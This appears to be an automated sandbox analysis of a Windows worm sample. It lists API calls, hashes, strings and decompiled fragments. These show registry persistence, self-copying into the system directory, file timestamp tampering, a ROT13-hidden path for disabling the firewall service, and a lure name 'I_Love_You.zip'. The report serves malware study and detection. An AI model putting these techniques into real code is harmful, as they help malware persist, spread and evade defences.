                                                                          • String ID: I_Love_You.zip
                                                                          • API String ID: 1562643418-69349870
                                                                          • Opcode ID: 272eccd8abf1a84982a6af5fa66f18c31c99625c96ed113c25d47f323b18ee03
                                                                          • Instruction ID: f9bbb920bae34a53852b7a8ae3bd8492a159d249183d5996932f43f3eb41e795
                                                                          • Opcode Fuzzy Hash: 272eccd8abf1a84982a6af5fa66f18c31c99625c96ed113c25d47f323b18ee03
                                                                          • Instruction Fuzzy Hash: 3A21DF759043048BCB11EF64D98169EBBF4EF84314F40897FE585A7381EB389698CF96
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: ??3@fclosefopenfreadmallocrealloc
                                                                          • String ID:
                                                                          • API String ID: 418953348-0
                                                                          • Opcode ID: 6e75ed8879061208f88e70ec4680b78b20488749353ea0872ea9de9d7e433587
                                                                          • Instruction ID: 75d7d26d9218dbdf86978dcb23e5f4fbbd0c24693f44c664e0b05ab087c45b19
                                                                          • Opcode Fuzzy Hash: 6e75ed8879061208f88e70ec4680b78b20488749353ea0872ea9de9d7e433587
                                                                          • Instruction Fuzzy Hash: 6E115A705087049BD300AF2AC4C475EFAE4EF44358F05893EE8C8AB3D2E77D98458B9A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: ProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32strcmp
                                                                          • String ID:
                                                                          • API String ID: 3031566330-0
                                                                          • Opcode ID: 2f2f5fe6758f399921e03acf2909baea6f39b8887e69680e0eb8b402d680a7dd
                                                                          • Instruction ID: 382b25c2ad7d0cef6f391bcc669a6196322adae5fe9b19759f67a92d9b3667d2
                                                                          • Opcode Fuzzy Hash: 2f2f5fe6758f399921e03acf2909baea6f39b8887e69680e0eb8b402d680a7dd
                                                                          • Instruction Fuzzy Hash: 4E1133B18043049AD710BF35D98539EBBF8AF84754F00857EED88A3281E7789958CB96
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetAtomNameA.KERNEL32 ref: 0040B05F
                                                                            • Part of subcall function 0040C130: fprintf.MSVCRT ref: 0040C15D
                                                                            • Part of subcall function 0040C130: fflush.MSVCRT ref: 0040C16D
                                                                            • Part of subcall function 0040C130: abort.MSVCRT(?,?,?,?,?,0040B0BE), ref: 0040C172
                                                                          Strings
                                                                          • %s:%u: failed assertion `%s', xrefs: 0040B0A9
                                                                          • w32_sharedptr->size == sizeof(W32_EH_SHARED), xrefs: 0040B097
                                                                          • GetAtomNameA (atom, s, sizeof(s)) != 0, xrefs: 0040B0BE
                                                                          • ../../gcc/gcc/config/i386/w32-shared-ptr.c, xrefs: 0040B0B0
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: AtomNameabortfflushfprintf
                                                                          • String ID: %s:%u: failed assertion `%s'$../../gcc/gcc/config/i386/w32-shared-ptr.c$GetAtomNameA (atom, s, sizeof(s)) != 0$w32_sharedptr->size == sizeof(W32_EH_SHARED)
                                                                          • API String ID: 2513348418-2696369246
                                                                          • Opcode ID: 055b4f41610cf93c2adfb2054d8dbcce5caf57ff53a8ecc1339ea75a1b6def78
                                                                          • Instruction ID: b50ba6c1e0c48ccbfb779697640dc8edf1bacce25001569c98304d8c7ef809a2
                                                                          • Opcode Fuzzy Hash: 055b4f41610cf93c2adfb2054d8dbcce5caf57ff53a8ecc1339ea75a1b6def78
                                                                          • Instruction Fuzzy Hash: E50152B0A043459BCB049F65C49426BBFE0EB98304F10C83FD999AB785D37DD8849B8E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Strings
                                                                          • Flfgrz\PheeragPbagebyFrg\Freivprf\FunerqNpprff, xrefs: 00403E8C
                                                                          • Start, xrefs: 00403EF5
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpenValue
                                                                          • String ID: Flfgrz\PheeragPbagebyFrg\Freivprf\FunerqNpprff$Start
                                                                          • API String ID: 779948276-912140713
                                                                          • Opcode ID: dcaaea9c11f4157e6766c7e5053caf7e5d707b883a19b3446069e9ff389a4345
                                                                          • Instruction ID: 3e2d9bc1c4b7ca1d7eb8bd648e7caadb70e702096ae42ff705bea3b0919a5c49
                                                                          • Opcode Fuzzy Hash: dcaaea9c11f4157e6766c7e5053caf7e5d707b883a19b3446069e9ff389a4345
                                                                          • Instruction Fuzzy Hash: 7101DBF0808315DBD710EF25C58575EBBF4BB44348F40C96DE988A7242E7789A4C8F56
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Free$AllocateGlobalProcessQuery_lstrcpy
                                                                          • String ID:
                                                                          • API String ID: 335828720-0
                                                                          • Opcode ID: 75049f9c1e6ab7a7902e374c79aefef9bba92b6269765223f3d14fb366891204
                                                                          • Instruction ID: 11d18a1c71fde03939184ec7a539e433b17fdc1711bb96236e21141529c11046
                                                                          • Opcode Fuzzy Hash: 75049f9c1e6ab7a7902e374c79aefef9bba92b6269765223f3d14fb366891204
                                                                          • Instruction Fuzzy Hash: 5F2148B09043019BDB00EF65C58476BBBF4BF44354F10893EE894AB382E778D958CB96
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 48%
                                                                          			E00404690(char* _a4, intOrPtr _a8, char _a12) {
                                                                          				void* _v12;
                                                                          				void* _v16;
                                                                          				intOrPtr _v28;
                                                                          				intOrPtr _v32;
                                                                          				intOrPtr _v36;
                                                                          				int _v40;
                                                                          				char _v44;
                                                                          				long _t23;
                                                                          				long _t29;
                                                                          				char* _t31;
                                                                          				char _t32;
                                                                          				void* _t33;
                                                                          				void* _t35;
                                                                          				intOrPtr* _t36;
                                                                          
                                                                          				_t31 = _a4;
                                                                          				_t32 = _a12;
                                                                          				_t23 = RegOpenKeyExA(0x80000002, _t31, 0, 0x20006,  &_v16);
                                                                          				_t35 = _t33 - 0xc;
                                                                          				if(_t23 == 0) {
                                                                          					L2:
                                                                          					_v44 = _t32;
                                                                          					L0040C310();
                                                                          					_t36 = _t35 - 4;
                                                                          					_v28 = _t23 + 1;
                                                                          					_v32 = _t32;
                                                                          					_v36 = 1;
                                                                          					_v40 = 0;
                                                                          					_v44 = _a8;
                                                                          					 *_t36 = _v16;
                                                                          					RegSetValueExA(??, ??, ??, ??, ??, ??);
                                                                          					 *((intOrPtr*)(_t36 - 0x18)) = _v16;
                                                                          					_t29 = RegCloseKey(??);
                                                                          				} else {
                                                                          					_t29 = RegOpenKeyExA(0x80000001, _t31, 0, 0x20006,  &_v16);
                                                                          					_t35 = _t35 - 0x14;
                                                                          					if(_t29 == 0) {
                                                                          						goto L2;
                                                                          					}
                                                                          				}
                                                                          				return _t29;
                                                                          			}

















                                                                          0x00404698
                                                                          0x0040469b
                                                                          0x004046c0
                                                                          0x004046c5
                                                                          0x004046ca
                                                                          0x004046fa
                                                                          0x004046fa
                                                                          0x004046fd
                                                                          0x00404702
                                                                          0x00404706
                                                                          0x0040470a
                                                                          0x0040470e
                                                                          0x00404716
                                                                          0x00404721
                                                                          0x00404728
                                                                          0x0040472b
                                                                          0x00404736
                                                                          0x00404739
                                                                          0x004046cc
                                                                          0x004046ee
                                                                          0x004046f3
                                                                          0x004046f8
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004046f8
                                                                          0x00404747

                                                                          APIs
                                                                          • RegOpenKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,00403CA0), ref: 004046C0
                                                                          • RegOpenKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00403CA0), ref: 004046EE
                                                                          • lstrlen.KERNEL32 ref: 004046FD
                                                                          • RegSetValueExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00403CA0), ref: 0040472B
                                                                          • RegCloseKey.ADVAPI32 ref: 00404739
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: Open$CloseValuelstrlen
                                                                          • String ID:
                                                                          • API String ID: 1812710942-0
                                                                          • Opcode ID: 73b13c2264a1e00e9fe4fc5da646dc3702ed2cfdff68836bb3d97b64fe935e54
                                                                          • Instruction ID: 9df0ca142f19effaadb1cf883799336216af180bd5b83d8b0879c3bebcc9d83d
                                                                          • Opcode Fuzzy Hash: 73b13c2264a1e00e9fe4fc5da646dc3702ed2cfdff68836bb3d97b64fe935e54
                                                                          • Instruction Fuzzy Hash: A711D4B0808315AFD700EF69C58535EBBF4FB84358F40892EEC9897241E37996488B92
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • lstrcat.KERNEL32 ref: 004028F6
                                                                          • lstrcat.KERNEL32 ref: 00402910
                                                                          • Sleep.KERNEL32 ref: 00402EC5
                                                                          • lstrcat.KERNEL32 ref: 00402929
                                                                            • Part of subcall function 00404F0A: GetModuleHandleA.KERNEL32 ref: 00404F27
                                                                            • Part of subcall function 00404F0A: LoadLibraryA.KERNEL32 ref: 00404F41
                                                                            • Part of subcall function 00404F0A: InternetGetConnectedState.WININET ref: 00404F6B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: lstrcat$ConnectedHandleInternetLibraryLoadModuleSleepState
                                                                          • String ID: L@$admin@bigtits.com
                                                                          • API String ID: 2287753751-2810593236
                                                                          • Opcode ID: 99046f5afce886c15dd2c272ce4c1a23cc7a039bac66575eec0d85a53d62dca4
                                                                          • Instruction ID: f8f521ecf4af99865028921a37a865861f0bf00d847523e115314e8123b3051d
                                                                          • Opcode Fuzzy Hash: 99046f5afce886c15dd2c272ce4c1a23cc7a039bac66575eec0d85a53d62dca4
                                                                          • Instruction Fuzzy Hash: 8611CE769053198BCB51EF64D9845CEBBF4EF44314F40857BE885A3240EB349698CF96
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00404620(CHAR* _a4, int _a8, CHAR* _a12) {
                                                                          				void* _v12;
                                                                          				void* _v20;
                                                                          				void* _v24;
                                                                          				CHAR* _v28;
                                                                          				int _t13;
                                                                          				CHAR* _t14;
                                                                          				int _t15;
                                                                          				CHAR* _t16;
                                                                          				void* _t17;
                                                                          				CHAR** _t20;
                                                                          
                                                                          				_t16 = _a4;
                                                                          				_t15 = _a8;
                                                                          				memset(_t16, 0, _t15);
                                                                          				_t13 = GetSystemDirectoryA(_t16, _t15);
                                                                          				_v28 = _t16;
                                                                          				L0040C310();
                                                                          				_t20 = _t17 - 4;
                                                                          				if( *((char*)(_t13 + _t16 - 1)) != 0x5c) {
                                                                          					_v28 = 0x40f156;
                                                                          					 *_t20 = _t16;
                                                                          					L0040C328();
                                                                          					_t20 = _t20 - 8;
                                                                          				}
                                                                          				_t14 = _a12;
                                                                          				_v28 = _t14;
                                                                          				 *_t20 = _t16;
                                                                          				L0040C328();
                                                                          				return _t14;
                                                                          			}













                                                                          0x00404628
                                                                          0x0040462b
                                                                          0x0040463d
                                                                          0x00404649
                                                                          0x00404651
                                                                          0x00404654
                                                                          0x00404659
                                                                          0x00404661
                                                                          0x00404663
                                                                          0x0040466b
                                                                          0x0040466e
                                                                          0x00404673
                                                                          0x00404673
                                                                          0x00404676
                                                                          0x00404679
                                                                          0x0040467d
                                                                          0x00404680
                                                                          0x0040468e

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: lstrcat$DirectorySystemlstrlenmemset
                                                                          • String ID:
                                                                          • API String ID: 1065462249-0
                                                                          • Opcode ID: 52e21126391f9f1a99804af5917ba2fff1412d2631d262131c3ca1ad05ec0486
                                                                          • Instruction ID: 403430f860fbc260acd97b7d31e4c447ffd2c09bc4da5a50c9a35cc548e728c4
                                                                          • Opcode Fuzzy Hash: 52e21126391f9f1a99804af5917ba2fff1412d2631d262131c3ca1ad05ec0486
                                                                          • Instruction Fuzzy Hash: F8F019B1408714DBD700BF29D98555EBFA4AB44754F40892EFC8867282D3399A588BDB
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetModuleFileNameA.KERNEL32 ref: 004056F4
                                                                            • Part of subcall function 00404620: memset.MSVCRT ref: 0040463D
                                                                            • Part of subcall function 00404620: GetSystemDirectoryA.KERNEL32 ref: 00404649
                                                                            • Part of subcall function 00404620: lstrlen.KERNEL32 ref: 00404654
                                                                            • Part of subcall function 00404620: lstrcat.KERNEL32 ref: 0040466E
                                                                            • Part of subcall function 00404620: lstrcat.KERNEL32 ref: 00404680
                                                                          • CopyFileA.KERNEL32 ref: 0040573B
                                                                            • Part of subcall function 004054F2: CreateFileA.KERNEL32 ref: 00405531
                                                                            • Part of subcall function 004054F2: SetFilePointer.KERNEL32 ref: 00405574
                                                                            • Part of subcall function 004054F2: WriteFile.KERNEL32 ref: 0040559A
                                                                            • Part of subcall function 004054F2: Sleep.KERNEL32 ref: 004055A9
                                                                            • Part of subcall function 004054F2: SetFilePointer.KERNEL32 ref: 004055D4
                                                                            • Part of subcall function 004054F2: WriteFile.KERNEL32 ref: 004055FA
                                                                            • Part of subcall function 004054F2: Sleep.KERNEL32 ref: 00405609
                                                                            • Part of subcall function 004054F2: SetFilePointer.KERNEL32 ref: 00405634
                                                                            • Part of subcall function 004054F2: WriteFile.KERNEL32 ref: 0040565A
                                                                            • Part of subcall function 004054F2: SetFilePointer.KERNEL32 ref: 0040567D
                                                                            • Part of subcall function 004054F2: WriteFile.KERNEL32 ref: 004056AF
                                                                            • Part of subcall function 004054F2: CloseHandle.KERNEL32 ref: 004056C0
                                                                            • Part of subcall function 0040435C: CreateFileA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404399
                                                                            • Part of subcall function 0040435C: GetFileTime.KERNEL32 ref: 004043CD
                                                                            • Part of subcall function 0040435C: CloseHandle.KERNEL32 ref: 004043E5
                                                                            • Part of subcall function 0040435C: CreateFileA.KERNEL32 ref: 00404423
                                                                            • Part of subcall function 0040435C: SetFileTime.KERNEL32 ref: 00404453
                                                                            • Part of subcall function 0040435C: CloseHandle.KERNEL32 ref: 00404467
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: File$PointerWrite$CloseCreateHandle$SleepTimelstrcat$CopyDirectoryModuleNameSystemlstrlenmemset
                                                                          • String ID: tepbcl.qyy$user32.dll
                                                                          • API String ID: 3363447152-446725262
                                                                          • Opcode ID: 9b9ff90298bf6fb1a175ed6403cba69dd8b60486c6b5008e2fa60c792a056c04
                                                                          • Instruction ID: 761182c28210547fcfec4951540a2b2b9fde320736257bd646c4dd079449f565
                                                                          • Opcode Fuzzy Hash: 9b9ff90298bf6fb1a175ed6403cba69dd8b60486c6b5008e2fa60c792a056c04
                                                                          • Instruction Fuzzy Hash: D401EDF08097149AC710BF65D58529EBFF4EF84758F01886EF5C827281C7B95588CB97
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CreateFileA.KERNEL32 ref: 00402F6F
                                                                          • GetFileSize.KERNEL32 ref: 00402F98
                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00402FAE
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
